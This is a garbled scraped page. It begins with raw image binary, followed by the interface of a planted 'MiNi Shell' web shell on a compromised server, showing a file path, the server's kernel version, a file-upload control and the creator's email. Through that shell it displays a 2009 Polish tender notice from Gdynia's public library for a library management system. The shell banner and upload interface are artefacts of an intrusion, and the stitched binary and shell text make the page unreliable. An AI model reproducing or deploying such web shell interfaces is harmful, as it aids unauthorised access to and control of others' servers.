JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090708/107947-N-2009.html

<p class="kh_header"><b>Gdynia: Dostawa wraz z udzieleniem licencji, instalacja, wdrożenie i serwisowanie zintegrowanego systemu zarządzania biblioteką.</b><br>
<b>Numer ogłoszenia: 107947 - 2009; data zamieszczenia: 08.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejska Biblioteka Publiczna w Gdyni , ul. Świętojańska 141, 81-401 Gdynia, woj. pomorskie, tel. 0-58 6227355, faks 0-58 6226417.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mbpgdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z udzieleniem licencji, instalacja, wdrożenie i serwisowanie zintegrowanego systemu zarządzania biblioteką..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa zintegrowanego systemu zarządzania biblioteką (ZSZB) wraz z udzieleniem licencji, jego instalacją, wdrożeniem i serwisowaniem. Wykonawca zobowiązany będzie do:
a.	dostarczenia ZSZB obejmującego moduły, o których mowa poniżej i jego zainstalowania;
b.	dostarczenia bezterminowej licencji na serwer SQL z niezbędną do funkcjonowania ZSZB liczbą licencji dostępu;
c.	przeniesienia bazy danych bibliotecznych z użytkowanego obecnie przez Zamawiającego systemu PATRON do ZSZB. Przeniesieniu podlegały będą co najmniej:
a.	wszystkie rekordy bibliograficzne i rekordy zasobu;
b.	wszystkie rekordy kartoteki haseł wzorcowych;
c.	wszystkie rekordy danych czytelników i rekordy wypożyczeń.
d.	przeprowadzenia szkolenia w zakresie zainstalowanego systemu
Wykonawca - po dokonanej instalacji ZSZB - zobowiązany będzie do przeprowadzenia szkoleń, konsultacji dla personelu informatycznego Zamawiającego:
1.	w zakresie technicznej obsługi i konfiguracji ZSZB w łącznej liczbie 10 roboczogodzin;
2.	w zakresie obsługi wszystkich modułów ZSZB w łącznej liczbie 80 roboczogodzin.
Szkolenia zostaną przeprowadzone w oparciu o harmonogram szkoleń w pomieszczeniach zapewnionych przez Wykonawcę. Wykonawca ponosi koszt organizacji szkolenia, w tym miejsca przeprowadzenia szkolenia. Harmonogram szkoleń strony uzgodnią w terminie 2 dni od dnia zainstalowania ZSZB. Harmonogram szkoleń będzie zawierał termin i miejsce szkolenia oraz listę pracowników biorących udział w szkoleniu.  
e.	 zapewnienia usług serwisowych dla dostarczonego ZSZB w okresie nie krótszym niż 12 miesięcy od daty  podpisania protokołu odbioru wdrożenia ZSZB bez zastrzeżeń, na warunkach nie gorszych niż:
1. Odpowiedzialność z tytułu gwarancji jakości obejmuje wady powstałe w chwili dokonania odbioru dostawy, instalacji, wdrożenia ZSZB przez Zamawiającego jak i powstałe po ich odbiorze, pod warunkiem, że wady te ujawnią się w ciągu terminu obowiązywania gwarancji.
2. Serwis gwarancyjny obejmuje:
a) dostawę wydanych aktualizacji oprogramowania ZSZB w terminie 30 dni od daty opublikowania;
b) świadczenie pomocy technicznej;
3.	Wykonawca zobowiązuje się do świadczenia pomocy technicznej obejmującej:
a)	usuwanie awarii ZSZB, 
b)	udzielanie odpowiedzi na pytania Zamawiającego związanych z użytkowaniem ZSZB, telefonicznie lub w drodze e-mail niezwłocznie nie później niż w terminie jednego dnia roboczego od złożenia zapytania.
c)	nieodpłatne dostosowanie oprogramowania ZSZB do zmian w przepisach prawa, wprowadzonych po zainstalowaniu ZSZB i dotyczących obszaru zastosowania oprogramowania.  
4.	Wykonawca w ciągu dwóch godzin od otrzymania zgłoszenia awarii powinien podjąć wstępne czynności w celu diagnozy i usunięcia awarii. Awarie będą zgłaszane telefonicznie, faksem lub pocztą elektroniczną w dniach i godzinach pracy Zamawiającego.
5.	Usunięcie awarii powinno nastąpić nie później niż w terminie 24 godzin od jej zgłoszenia, z zastrzeżeniem zdania drugiego. Skomplikowane awarie będą usuwane w terminie uzgodnionym przez strony. 

1.	Zintegrowany System Zarządzania Biblioteką online powinien charakteryzować się następującymi cechami:
-	tolerancyjność systemu rozumiana jako kontrolowanie pracy człowieka, wykrywanie błędów i ich usuwanie, ostrzeganie przed konsekwencjami i zabezpieczanie przed nimi;
-	aktywność systemu rozumiana jako przejmowanie w jak największym stopniu inicjatywy od użytkownika, sterowanie i podsuwanie rozwiązań, wskazywanie następnych kroków,
-	dobre rozplanowanie informacji na ekranie, łatwy w obsłudze interfejs katalogowy,
-	efektywna wymienialność informacji z innymi systemami.
2.	Zintegrowany System Zarządzania Biblioteką powinien składać się z następujących modułów:
a)	Modułu katalogowania,
b)	Modułu gromadzenia,
c)	Modułu wypożyczeń,
d)	Modułu dostępu do danych poprzez WWW - (OPAC WWW),
e)	Modułu katalogu dla dzieci
f)	Modułu serwera Z39.50
3.	Licencje stanowiskowe Systemu powinny być udzielane na użytkownika, bez przypisania do stanowiska pracy.
4.	Oprogramowanie stanowiskowe ZSZB powinno pracować w środowisku systemu operacyjnego Windows2000, XP, VISTA.
5.	Wszystkie moduły oprogramowania stanowiskowego ZSZB powinny pracować jako aplikacje systemu Windows. Nie jest dopuszczalne emulowanie środowisk operacyjnych.
6.	Baza danych ZSZB musi być utrzymywana w systemie SQL, spełniającym co najmniej następujące wymagania:
a)	praca w środowisku systemu operacyjnego Windows Server,
b)	możliwość automatycznego składowania i odtwarzania baz danych bez zatrzymywania pracy serwera,
c)	wsparcie dla procesorów wielordzeniowych i serwerów wieloprocesorowych (do 4 procesorów) rozumiane jako możliwość równoległego wykonywania operacji na wszystkich rdzeniach,procesorach.
6.	Serwery OPAC, Z39.50 i serwer katalogu dziecięcego powinny pracować w środowisku operacyjnym Windows Server i współpracować z właściwym dla tego środowiska serwerem http. Nie jest dopuszczalne emulowanie środowisk operacyjnych.
7.	Całość oprogramowania ZSZB wraz z dokumentacją musi być sporządzona w języku polskim.
8.	Wszystkie funkcje definicyjne powinny być dostępne w postaci interfejsu okienkowego Windows. Nie dopuszcza się użycia w tym celu języków skryptowych lub podobnych, z wyjątkiem definicji posługujących się językiem HTML.
9.	System powinien zapewnić integrację z urządzeniami RFID poprzez protokół SIP-2.
10.	System musi umożliwiać definiowanie kont użytkowników (pracowników), z możliwością określenia uprawnień do poszczególnych modułów oraz funkcji systemu.
Uprawnienia powinny w szczególności pozwalać na odrębne kontrolowanie dostępu do następujących części funkcjonalnych ZSZB:
 
b)	tworzenie i modyfikowanie bibliograficznych opisów formalnych,
c)	tworzenie i modyfikowanie bibliograficznych opisów przedmiotowych (stosowanie rozwiniętych haseł przedmiotowych)
d)	tworzenie i modyfikowanie rozwiniętych haseł przedmiotowych,
e)	tworzenie i modyfikowanie kartoteki haseł wzorcowych,
f)	tworzenie i modyfikowanie rekordów zasobu dla poszczególnych filii,
g)	obsługa modułu wypożyczeń dla poszczególnych filii

Liczba licencji:
1) Moduł katalogowania: 	10 licencji bezterminowych stanowiskowych i 10 licencji trzyletnich stanowiskowych		
2) Moduł gromadzenia:35  bezterminowych licencji stanowiskowych oraz 10 trzyletnich licencji stanowiskowych.	
3) Moduł wypożyczeń:	46  bezterminowych licencji stanowiskowych.
4) Moduł OPAC:1 bezterminowa licencja na serwer, bez ograniczeń w liczbie jednoczesnych dostępów.	
5) Moduł katalogu dla dzieci:	6  bezterminowych licencji stanowiskowych.
6) Moduł serwera Z39.50: jedna bezterminowa licencja na serwer, bez ograniczeń w liczbie jednoczesnych dostępów.		
7) Serwer SQL:	1 licencja bezterminowa na serwer SQL z min. 80 licencjami dostępu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.16.00.00-7, 48.16.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują lub będą dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; 
c.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
d.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 
2.Warunek posiadania niezbędnej wiedzy i doświadczenia Zamawiający uzna za spełniony jeśli:
a)	Wykonawca wykaże, że w okresie ostatnich 3 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał co najmniej 1 (jedną) dostawy zintegrowanego systemu zarządzania biblioteką, o wartości dostawy co najmniej 100 000 zł netto każda;.
3.Za spełnienie warunku znajdowania się w odpowiedniej sytuacji ekonomicznej i finansowej Zamawiający uzna wykazanie się posiadaniem środków finansowych lub zdolnością kredytową na kwotę nie niższą niż 120 000 zł.
4.Wykonawca wykaże, że posiada system zarządzania jakością zgodny z normą ISO 9001, lub stosuje równoważne środki zapewnienia jakości, w zakresie zarządzania jakością wdrażania i serwisowania oprogramowania.
Wykonawcy w celu potwierdzenia spełniania wymaganych warunków udziału 
w przedmiotowym postępowaniu są zobowiązani złożyć stosowne oświadczenia i dokumenty wyszczególnione w pkt V niniejszej SIWZ.
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty. Ocena spełnienia warunków udziału w postępowaniu, będzie dokonana przez Zamawiającego na zasadzie spełnia, nie spełnia. W przypadku nie spełnienia jakiegokolwiek warunku udziału w postępowaniu, Wykonawca zostanie wykluczony z postępowania.
W przypadku Wykonawców występujących wspólnie wymagane jest, aby każdy 
z wykonawców występujących wspólnie spełniał warunek określony w pkt 1 lit. d oraz żeby wspólnie spełniali warunki określone w pkt 2. oraz 3,4..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy ubiegający się o niniejsze zamówienie składają wraz z ofertą:
1. Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy, na formularzu stanowiącym Załącznik Nr 3 do SIWZ.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Informacja z banku, w którym Wykonawca posiada rachunek bankowy, potwierdzająca, że Wykonawca posiada środki finansowe lub zdolność kredytową, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
4. Wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem przedmiotu dostawy, jej wartości, dat wykonania oraz odbiorców.  Do wykazu należy dołączyć dokumenty potwierdzające, że dostawy te zostały wykonane należycie. Wzór wykazu stanowi załącznik nr 4 do niniejszej SIWZ.
5. Zaświadczenie niezależnego podmiotu zajmującego się poświadczeniem zgodności działań wykonawcy z normami jakościowymi, potwierdzające zgodność systemu zarządzania jakością Wykonawcy z normą ISO 9001 w zakresie obejmującym wdrażanie oraz serwisowanie oprogramowania. Wykonawca może zamiast tego zaświadczenia złożyć inne dokumenty potwierdzające odpowiednio stosowanie przez Wykonawcę równoważnych środków zapewnienia jakości.

Dokumenty wymienione w pkt 2, 3, 4, 5 mogą być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy. Dokument wymieniony w pkt 1 Wykonawca zobowiązany jest złożyć w oryginale. W przypadku oferty wspólnej dokumenty wymienione w pkt 2 składa każdy z podmiotów występujących wspólnie, natomiast dokument z pkt 1, 3, 4, 5 składają wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mbpgdynia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejska Biblioteka Publiczna w Gdyni

ul. Świętojańska 141/143, 81-401 Gdynia.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2009 godzina 10:45, miejsce: Sekretariat w siedzibie Zamawiającego (Miejska Biblioteka Publiczna w Gdyni
, ul. Świętojańska 141/143, 81-401 Gdynia).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com